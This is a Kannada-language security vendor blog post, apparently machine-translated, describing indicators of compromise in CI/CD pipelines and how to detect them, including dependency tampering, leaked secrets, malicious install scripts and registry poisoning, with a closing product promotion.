ಪರಿಣಾಮ: ಸಮಗ್ರತೆಯ ವೈಫಲ್ಯಗಳು ಸಾಮಾನ್ಯವಾಗಿ ಟ್ಯಾಂಪರಿಂಗ್, ರಿಜಿಸ್ಟ್ರಿ ವಿಷಪೂರಿತ ಅಥವಾ ಮಾಲ್‌ವೇರ್ ಇಂಜೆಕ್ಷನ್ ಅನ್ನು ಸೂಚಿಸುತ್ತವೆ.

ಪತ್ತೆ: ಸಹಿ ಪರಿಶೀಲನೆಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಿ, ಚೆಕ್‌ಸಮ್ ಮೌಲ್ಯೀಕರಣವನ್ನು ಜಾರಿಗೊಳಿಸಿ ಮತ್ತು ಸಹಿ ಮಾಡದ ಘಟಕಗಳನ್ನು ನಿರ್ಬಂಧಿಸಿ. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ, ಪ್ರತಿಯೊಂದು ವಿಫಲ ಪರಿಶೀಲನೆಯನ್ನು ರಾಜಿಯ ಸ್ಪಷ್ಟ ಪುರಾವೆಯಾಗಿ ಪರಿಗಣಿಸಿ.

CI/CD ಒಂದು ನೋಟದಲ್ಲಿ ರಾಜಿಯ ಸೂಚಕಗಳು

ರಾಜಿ ಸೂಚಕ (IOC) ಪರಿಣಾಮ CI/CD Pipelines ಪತ್ತೆ ಮಾಡುವುದು ಹೇಗೆ
ಅನುಮಾನಾಸ್ಪದ ಅವಲಂಬನೆ ಬದಲಾವಣೆಗಳು ದಾಳಿಕೋರರು ಪ್ಯಾಕೇಜ್ ಮ್ಯಾನೇಜರ್‌ಗಳಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಲೈಬ್ರರಿಗಳನ್ನು ಚುಚ್ಚುತ್ತಾರೆ, ಇದು ಬಿಲ್ಡ್‌ಗಳಲ್ಲಿ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಲು ಕಾರಣವಾಗುತ್ತದೆ. ಲಾಕ್‌ಫೈಲ್ ವ್ಯತ್ಯಾಸಗಳನ್ನು ಟ್ರ್ಯಾಕ್ ಮಾಡಿ, ಅವಲಂಬನೆ ವಿಮರ್ಶೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸಿ ಮತ್ತು ಅವಲಂಬನೆಗಳನ್ನು ನಿರಂತರವಾಗಿ ಸ್ಕ್ಯಾನ್ ಮಾಡಿ.
ಬಿಲ್ಡ್‌ಗಳಲ್ಲಿ ಅಸ್ಪಷ್ಟ ಕೋಡ್ ಗುಪ್ತ ಪೇಲೋಡ್‌ಗಳು ಬಿಲ್ಡ್‌ಗಳು ಅಥವಾ ರನ್‌ಟೈಮ್ ಸಮಯದಲ್ಲಿ ಪತ್ತೆಹಚ್ಚದೆ ಕಾರ್ಯಗತಗೊಳ್ಳುತ್ತವೆ. ಬಳಸಿ SAST ಮತ್ತು ಬೇಸ್64, ಹೆಕ್ಸ್ ಅಥವಾ ಪ್ಯಾಕ್ ಮಾಡಿದ ಕೋಡ್ ಮಾದರಿಗಳನ್ನು ಫ್ಲ್ಯಾಗ್ ಮಾಡಲು ಮಾಲ್‌ವೇರ್ ಸ್ಕ್ಯಾನಿಂಗ್.
Git ನಲ್ಲಿ ಬಹಿರಂಗಪಡಿಸಿದ ರಹಸ್ಯಗಳು ಸೋರಿಕೆಯಾದ ಟೋಕನ್‌ಗಳು ಅಥವಾ API ಕೀಗಳು ದಾಳಿಕೋರರಿಗೆ ನಿರ್ಣಾಯಕ ವ್ಯವಸ್ಥೆಗಳಿಗೆ ನೇರ ಪ್ರವೇಶವನ್ನು ನೀಡುತ್ತವೆ. Git ನಲ್ಲಿ ರಹಸ್ಯ ಸ್ಕ್ಯಾನ್‌ಗಳನ್ನು ರನ್ ಮಾಡಿ hooks ಮತ್ತು ಸೋರಿಕೆಯಾದ ರುಜುವಾತುಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಹಿಂತೆಗೆದುಕೊಳ್ಳಿ.
ತಿದ್ದುಪಡಿ ಮಾಡಲಾಗಿದೆ Pipeline ಸಂರಚನೆಗಳು ಮಾರ್ಪಡಿಸಿದ ಕೆಲಸದ ಹರಿವುಗಳು ಡೇಟಾ ಹೊರಹರಿವು ಅಥವಾ ಒಳಗೆ ನಿರಂತರತೆಯನ್ನು ಅನುಮತಿಸುತ್ತದೆ CI/CD. PR ಅನುಮೋದನೆಗಳ ಅಗತ್ಯವಿದೆ, ಸಹಿ ಮಾಡಿದ ಸಂರಚನೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸಿ ಮತ್ತು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಿ pipeline ಬದಲಾವಣೆಗಳನ್ನು.
ಸವಲತ್ತು IaC ಡೀಫಾಲ್ಟ್‌ಗಳು ಅತಿಯಾಗಿ ಅನುಮತಿಸುವ ಪಾತ್ರಗಳು ಅಥವಾ ಅಸುರಕ್ಷಿತ ಡೀಫಾಲ್ಟ್‌ಗಳು ಮೋಡದ ಪರಿಸರವನ್ನು ಬಹಿರಂಗಪಡಿಸುತ್ತವೆ. ಕನಿಷ್ಠ ಸವಲತ್ತು ಜಾರಿಗಾಗಿ ಟೆರಾಫಾರ್ಮ್, ಕುಬರ್ನೆಟ್ಸ್ ಮತ್ತು ಹೆಲ್ಮ್ ಫೈಲ್‌ಗಳನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಿ.
ಅಸಾಮಾನ್ಯ ದೇಹ ವರ್ತನೆಗಳು Pipelineಗಳನ್ನು ಮಾಲ್‌ವೇರ್ ವಿತರಣಾ ಕೇಂದ್ರಗಳಾಗಿ ಅಥವಾ ಪಾರ್ಶ್ವ ಚಲನೆಗಾಗಿ ಬಳಸಲಾಗುತ್ತದೆ. ಅನಿರೀಕ್ಷಿತ ಡೌನ್‌ಲೋಡ್‌ಗಳು, ಪ್ರಕ್ರಿಯೆಗಳು ಅಥವಾ ಹೊರಹೋಗುವ ಕರೆಗಳಿಗಾಗಿ ಬಿಲ್ಡ್ ಲಾಗ್‌ಗಳನ್ನು ವಿಶ್ಲೇಷಿಸಿ.
ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು ರನ್‌ಟೈಮ್ ಪರೀಕ್ಷೆಯ ಮೊದಲು ಮರೆಮಾಡಲಾದ ಪೂರ್ವ/ಅನುಸ್ಥಾಪನೆಯ ನಂತರದ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು ಪೇಲೋಡ್‌ಗಳನ್ನು ಪ್ರಚೋದಿಸುತ್ತವೆ. ಅಪಾಯಕಾರಿ npm/PyPI ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳನ್ನು ನಿರ್ಬಂಧಿಸಿ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ನಿರ್ಬಂಧಿಸಿ CI/CD ಉದ್ಯೋಗಗಳು.
ರಿಜಿಸ್ಟ್ರಿ ವಿಷಪೂರಿತ ಟ್ರೋಜೀಕರಿಸಿದ ಕಲಾಕೃತಿಗಳು ನೋಂದಣಿಗಳಲ್ಲಿ ವಿಶ್ವಾಸಾರ್ಹ ಚಿತ್ರಗಳು ಅಥವಾ ಬೈನರಿಗಳನ್ನು ಬದಲಾಯಿಸುತ್ತವೆ. ಚೆಕ್ಸಮ್‌ಗಳನ್ನು ಪರಿಶೀಲಿಸಿ, ಸಹಿ ಮೌಲ್ಯೀಕರಣವನ್ನು ಜಾರಿಗೊಳಿಸಿ ಮತ್ತು ನೋಂದಣಿಗಳನ್ನು ಪೂರ್ವಭಾವಿಯಾಗಿ ಸ್ಕ್ಯಾನ್ ಮಾಡಿ.
ಬಳಕೆದಾರನ ಅಸಹಜ ಚಟುವಟಿಕೆ ಅಪಾಯಕ್ಕೀಡಾದ ಖಾತೆಗಳು ದುರುದ್ದೇಶಪೂರಿತತೆಯನ್ನು ಪ್ರಚೋದಿಸುತ್ತವೆ commitರು ಅಥವಾ ಟ್ರಿಗ್ಗರ್ pipelines. MFA ಜಾರಿಗೊಳಿಸಿ, ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಿ commitವೈಪರೀತ್ಯಗಳಿಗೆ s, ಮತ್ತು ವಿಶ್ಲೇಷಿಸಿ login ನಮೂನೆಗಳು.
ವಿಫಲವಾದ ಸಮಗ್ರತೆ ಅಥವಾ ಸಹಿ ಪರಿಶೀಲನೆಗಳು ಪ್ರವೇಶಿಸುವ ತಿದ್ದುಪಡಿ ಮಾಡಲಾದ ಕೋಡ್, ಅವಲಂಬನೆಗಳು ಅಥವಾ ಚಿತ್ರಗಳನ್ನು ಸೂಚಿಸುತ್ತದೆ pipeline. ಸಮಗ್ರತೆಯ ಪರಿಶೀಲನೆಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತಗೊಳಿಸಿ ಮತ್ತು ಸಹಿ ಮಾಡದ ಅಥವಾ ಹೊಂದಿಕೆಯಾಗದ ಘಟಕಗಳನ್ನು ನಿರ್ಬಂಧಿಸಿ.

ಸಾಂಪ್ರದಾಯಿಕ ಐಒಸಿ ಸೈಬರ್ ಭದ್ರತೆ ಏಕೆ ತಪ್ಪಿಸಿಕೊಳ್ಳುತ್ತದೆ CI/CD ಅಪಾಯಗಳು

ಹೆಚ್ಚಿನ ಸಂಸ್ಥೆಗಳು ಈಗಾಗಲೇ ಸರ್ವರ್‌ಗಳು, ಕಂಪ್ಯೂಟರ್‌ಗಳು ಅಥವಾ ನೆಟ್‌ವರ್ಕ್‌ಗಳಲ್ಲಿ ರಾಜಿ ಸೂಚಕಗಳನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡುತ್ತವೆ. ಆದಾಗ್ಯೂ, IOC ಸೈಬರ್ ಭದ್ರತೆಗೆ ಈ ಕ್ಲಾಸಿಕ್ ವಿಧಾನವು ನಿರ್ಲಕ್ಷಿಸುತ್ತದೆ CI/CD pipelineಗಳು, ಅವು ಈಗ ಅತ್ಯಂತ ನಿರ್ಣಾಯಕ ದಾಳಿ ಮೇಲ್ಮೈಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ. ವಾಸ್ತವವಾಗಿ, pipelineಗಳು ಸಾಂಪ್ರದಾಯಿಕ ಪರಿಕರಗಳು ಪತ್ತೆಹಚ್ಚಲು ಸಾಧ್ಯವಾಗದ ವಿಶಿಷ್ಟ ರಾಜಿ ಸಂಕೇತಗಳನ್ನು ತೋರಿಸುತ್ತವೆ.

ಸಾಂಪ್ರದಾಯಿಕ ಭದ್ರತೆಯಲ್ಲಿ ರಾಜಿಯ ಸೂಚಕಗಳು

ಸಾಂಪ್ರದಾಯಿಕ IOC ಸೈಬರ್ ಭದ್ರತೆಯಲ್ಲಿ, ಸಾಮಾನ್ಯವಾಗಿ ಗಮನವು:

  • ಅಸಾಮಾನ್ಯ loginಕದ್ದ ರುಜುವಾತುಗಳನ್ನು ಸೂಚಿಸುವ ರುಜುವಾತುಗಳು ಅಥವಾ IP ವಿಳಾಸಗಳು.
  • ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಬಹಿರಂಗಪಡಿಸುವ ಅನುಮಾನಾಸ್ಪದ ಫೈಲ್ ಹ್ಯಾಶ್‌ಗಳು ಅಥವಾ ರಿಜಿಸ್ಟ್ರಿ ಬದಲಾವಣೆಗಳು.
  • ಅನಿರೀಕ್ಷಿತ ಹೊರಹೋಗುವ ಸಂಚಾರವು ಡೇಟಾ ಸೋರಿಕೆಯನ್ನು ಸೂಚಿಸುತ್ತದೆ.

ಇವುಗಳು ಪ್ರಸಿದ್ಧ ಸೂಚಕಗಳಾಗಿದ್ದು, ಇವುಗಳನ್ನು ಸಹ ಟ್ರ್ಯಾಕ್ ಮಾಡಲಾಗಿದೆ MITER ATT&CK ಫ್ರೇಮ್‌ವರ್ಕ್, ಇದು ಸಾಮಾನ್ಯ ಎದುರಾಳಿ ನಡವಳಿಕೆಗಳು ಮತ್ತು ತಂತ್ರಗಳನ್ನು ನಕ್ಷೆ ಮಾಡುತ್ತದೆ. ಇವು ಉಪಯುಕ್ತ ಸಂಕೇತಗಳಾಗಿವೆ. ಆದಾಗ್ಯೂ, ಅವು ಮುಖ್ಯವಾಗಿ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗಳು ಅಥವಾ ಕಾರ್ಪೊರೇಟ್ ನೆಟ್‌ವರ್ಕ್‌ಗಳಿಗೆ ಅನ್ವಯಿಸುತ್ತವೆ. ಪರಿಣಾಮವಾಗಿ, ಸಾಫ್ಟ್‌ವೇರ್ ಪೂರೈಕೆ ಸರಪಳಿಯಲ್ಲಿ ಮೊದಲು ಸಂಭವಿಸುವ ಸೂಕ್ಷ್ಮವಾದ ಟ್ಯಾಂಪರಿಂಗ್ ಅನ್ನು ಅವು ತಪ್ಪಿಸಿಕೊಳ್ಳುತ್ತವೆ.

ಏಕೆ CI/CD Pipelineಗಳು ವಿಭಿನ್ನವಾಗಿವೆ

CI/CD pipelineಗಳು ಡೆವಲಪರ್‌ಗಳು ಬಳಸುವ ಸ್ವಯಂಚಾಲಿತ ಪರಿಸರಗಳಾಗಿವೆ commit ಕೋಡ್, ಪುಲ್ ಡಿಪೆಂಡೆನ್ಸಿಗಳು ಮತ್ತು ಬಿಡುಗಡೆ ಬಿಲ್ಡ್‌ಗಳು. ದಾಳಿಕೋರರಿಗೆ ಇಲ್ಲಿ ಒಂದು ರಾಜಿ ಪ್ರತಿ ನಿಯೋಜನೆಯಲ್ಲೂ ನಡೆಯುತ್ತದೆ ಎಂದು ತಿಳಿದಿದೆ. ಅದರ ಪ್ರಕಾರ, ರಾಜಿಯ ಸೂಚಕಗಳು ಯಾವುವು CI/CD pipelineಅವು ತುಂಬಾ ಭಿನ್ನವಾಗಿ ಕಾಣುತ್ತವೆ:

  • package.json ಅಥವಾ requirements.txt ಗೆ ದುರುದ್ದೇಶಪೂರಿತ ಅವಲಂಬನೆಯನ್ನು ಸದ್ದಿಲ್ಲದೆ ಸೇರಿಸಲಾಗಿದೆ.
  • Git ನಲ್ಲಿ ಬಹಿರಂಗಗೊಂಡ API ಕೀಗಳು ಅಥವಾ ಟೋಕನ್‌ಗಳು commits ಅಥವಾ .env ಫೈಲ್‌ಗಳು.
  • npm ಅಥವಾ PyPI ಪ್ಯಾಕೇಜ್‌ಗಳಲ್ಲಿ ಅಸ್ಪಷ್ಟ ಕೋಡ್ ಅನ್ನು ಇಂಜೆಕ್ಟ್ ಮಾಡಲಾಗಿದೆ.
  • ಪ್ರಿವಿಲೇಜ್ಡ್: ನಿಜದಂತಹ ಅಸುರಕ್ಷಿತ ಡೀಫಾಲ್ಟ್‌ಗಳನ್ನು ಹೊಂದಿರುವ ಟೆರಾಫಾರ್ಮ್ ಅಥವಾ ಕುಬರ್ನೆಟ್ಸ್ ಫೈಲ್‌ಗಳು.
  • Pipeline ಡೇಟಾವನ್ನು ಹೊರಹಾಕಲು ಅಥವಾ ಹಿಂಬಾಗಿಲುಗಳನ್ನು ತೆರೆಯಲು ಸಂಪಾದಿಸಲಾದ ಕೆಲಸಗಳು.

ಈ ರಾಜಿ ಸಂಕೇತಗಳು CI/CD ಅದೃಶ್ಯವಾಗಿರಿ standard ಭದ್ರತಾ ಪರಿಕರಗಳು.

ಐಒಸಿ ಸೈಬರ್ ಭದ್ರತೆಯಲ್ಲಿನ ಅಂತರ

ಅನೇಕ ತಂಡಗಳು ರಾಜಿ ಸೂಚಕಗಳ ಮೌಲ್ಯವನ್ನು ಅರ್ಥಮಾಡಿಕೊಂಡಿದ್ದರೂ, ಅವರು ಇನ್ನೂ ಸರ್ವರ್‌ಗಳು ಮತ್ತು ನೆಟ್‌ವರ್ಕ್ ಲಾಗ್‌ಗಳಿಂದ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ಮಾತ್ರ ಅವಲಂಬಿಸಿರುತ್ತಾರೆ. ಆದ್ದರಿಂದ, ದಾಳಿಕೋರರು ಸಾಮಾನ್ಯ ಕುರುಹುಗಳನ್ನು ಬಿಡದೆ ಬಿಲ್ಡ್‌ಗಳನ್ನು ವಿಷಪೂರಿತಗೊಳಿಸಬಹುದು ಅಥವಾ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಸೇರಿಸಬಹುದು. ಇದಕ್ಕಾಗಿಯೇ XZ ಯುಟಿಲ್ಸ್ ಬ್ಯಾಕ್‌ಡೋರ್ ಅಥವಾ ದುರುದ್ದೇಶಪೂರಿತ npm ಪ್ಯಾಕೇಜ್‌ಗಳಂತಹ ಘಟನೆಗಳು ಉತ್ಪಾದನೆಯನ್ನು ತಲುಪುವವರೆಗೆ ಪತ್ತೆಯಾಗಲಿಲ್ಲ.

ಈ ರೀತಿಯ ಪೂರೈಕೆ ಸರಪಳಿ ಹೊಂದಾಣಿಕೆಗಳನ್ನು ಸಹ ಎತ್ತಿ ತೋರಿಸಲಾಗಿದೆ CISA ಯ ಪೂರೈಕೆ ಸರಪಳಿ ಭದ್ರತಾ ಮಾರ್ಗದರ್ಶನ, ಇದು ದಾಳಿಕೋರರು ಹೆಚ್ಚಾಗಿ ಗುರಿಯಾಗಿಸಿಕೊಳ್ಳುತ್ತಾರೆ ಎಂದು ಎಚ್ಚರಿಸುತ್ತದೆ CI/CD pipelineಗಳು ಮತ್ತು ನೋಂದಣಿಗಳು.

ಟೇಕ್ಅವೇ

ಸಾಂಪ್ರದಾಯಿಕ IOC ಸೈಬರ್ ಭದ್ರತೆ ಅಗತ್ಯ ಆದರೆ ಸಾಕಾಗುವುದಿಲ್ಲ. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ, ತಂಡಗಳು ನಿರ್ದಿಷ್ಟವಾದ ರಾಜಿ ಸೂಚಕಗಳನ್ನು ಗುರುತಿಸಬೇಕು CI/CD pipelines. ಆಗ ಮಾತ್ರ ಅವರು ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಪತ್ತೆಹಚ್ಚಬಹುದು ಅಥವಾ pipeline ಪರಿಸರದಲ್ಲಿ ಹರಡುವ ಮೊದಲು ನಿಂದನೆ.

ಸ್ಕಾ-ಪರಿಕರಗಳು-ಸಾಫ್ಟ್‌ವೇರ್-ಸಂಯೋಜನೆ-ವಿಶ್ಲೇಷಣೆ-ಪರಿಕರಗಳು
ನಿಮ್ಮ ಸಾಫ್ಟ್‌ವೇರ್ ಅಪಾಯಗಳಿಗೆ ಆದ್ಯತೆ ನೀಡಿ, ನಿವಾರಿಸಿ ಮತ್ತು ಸುರಕ್ಷಿತಗೊಳಿಸಿ
ನಿಮ್ಮ ಉಚಿತ ಖಾತೆಯನ್ನು ಪಡೆಯಿರಿ.
ಯಾವುದೇ ಕ್ರೆಡಿಟ್ ಕಾರ್ಡ್ ಅಗತ್ಯವಿಲ್ಲ.

ನಿಮ್ಮ ಸಾಫ್ಟ್‌ವೇರ್ ಅಭಿವೃದ್ಧಿ ಮತ್ತು ವಿತರಣೆಯನ್ನು ಸುರಕ್ಷಿತಗೊಳಿಸಿ

Xygeni ಉತ್ಪನ್ನ ಸೂಟ್‌ನೊಂದಿಗೆ